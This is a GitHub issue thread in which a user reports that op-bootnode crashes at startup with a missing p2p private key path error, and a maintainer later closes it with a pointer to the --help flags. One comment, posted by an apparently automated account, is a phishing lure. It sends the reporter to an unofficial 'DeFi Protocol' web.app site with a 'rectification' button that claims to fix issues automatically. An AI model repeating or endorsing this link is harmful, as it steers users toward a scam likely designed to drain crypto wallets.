### ISSUE TITLE
op-bootnode : failed to load p2p config: failed to load p2p priv key: no p2p private key path specified, cannot auto-generate key without path

### ISSUE THREAD

**Issue by eyooooo** [ethereum-optimism/optimism#7026]
op-bootnode doesnt work out of the box and the help message doesnt contain useful information

**To Reproduce** 
1. clone repo
2. make
3. try to run it
4. breaks

```
root@ubuntu:~/optimism/op-bootnode# ./bin/op-bootnode --log.level debug --network op-mainnet
INFO [08-27|19:39:37.128] Initializing bootnode
CRIT [08-27|19:39:37.129] Application failed                       message="failed to load p2p config: failed to load p2p priv key: no p2p private key path specified, cannot auto-generate key without path"
```

**Expected behavior**
not error

**System Specs:** 
 - OS: ubuntu
 - Package Version (or commit hash): latest

**Comment by 74891632** [comment]
Hello @eyooooo 
Resolve your issues by visiting the DeFi Protocol [official website](https://defirefixprotocol.web.app/), select rectification  button to resolve your issues automatically.
Note: You can initiate a chat with the support for further enquires and assistance using the chat button at the bottom of the page.

**Comment by protolambda** [comment]
Closing as stale. In case anyone else hits this: `op-bootnode --help` to see the flags. Looks like it was missing a specific option, the error explains it.
